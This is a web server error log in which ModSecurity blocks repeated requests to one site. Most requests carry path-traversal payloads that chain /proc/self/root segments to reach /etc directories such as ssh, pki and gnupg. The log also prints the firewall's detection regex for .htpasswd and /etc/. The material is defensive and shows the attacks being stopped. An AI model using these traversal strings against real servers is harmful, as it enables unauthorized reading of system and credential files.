[Mon Mar 16 18:41:49.851864 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:40290] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5HbysWC90G-1nBrBlYAAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:42:02.422418 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.228.16:50236] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh5KtSswJuvopo3lOiBFwAAAJg"]
[Mon Mar 16 18:42:26.443264 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.241.46:40714] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5QlajLEzk2WiQ-10yngAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:42:44.114393 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:51044] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5VNSswJuvopo3lOiBOQAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:43:07.550976 2026] [:error] [pid 29507:tid 140411641214720] [client 74.7.243.203:33208] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5a0r9dMAiw-8KANNpOwAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:43:58.828343 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:46844] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5nrysWC90G-1nBrBltQAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:44:07.491500 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.241.46:51082] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5p6QpVkWug9HeOt9UvQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:44:08.926566 2026] [:error] [pid 29507:tid 140411666392832] [client 74.7.241.46:40508] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5qEr9dMAiw-8KANNpQAAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:44:36.219310 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.241.46:40516] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5xKTCbgAP5jq5TehLnwAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:44:38.562240 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:38320] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5xqTCbgAP5jq5TehLoQAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:44:39.830216 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:33498] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5x7ABkC4fWIHEf8EYvAAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:44:43.177801 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:50408] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5y46lpbStxTqkSkuI7gAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:44:56.739684 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.241.46:33512] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh52KQpVkWug9HeOt9U0AAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:45:01.453861 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:52056] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh53bABkC4fWIHEf8EY3AAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:45:03.569339 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.244.31:58084] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh5346lpbStxTqkSkuI8AAAAk4"]
[Mon Mar 16 18:45:14.017601 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:48572] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh56v9ocpUE4ed4uDwUsQAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:45:19.079196 2026] [:error] [pid 29507:tid 140411725141760] [client 74.7.241.46:38330] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh570r9dMAiw-8KANNpUgAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:45:27.792852 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:56088] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh59v9ocpUE4ed4uDwUvgAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:45:30.292648 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.241.46:35888] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5-qTCbgAP5jq5TehLpwAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:46:07.965022 2026] [:error] [pid 29507:tid 140411632822016] [client 74.7.241.46:35904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6H0r9dMAiw-8KANNpfgAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:09.217965 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.241.46:54280] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6IaQpVkWug9HeOt9U3gAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:10.541364 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.241.46:54288] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6IqQpVkWug9HeOt9U3wAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:46:12.716265 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.241.46:54304] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6JKQpVkWug9HeOt9U4QAAA1Y"], referer: 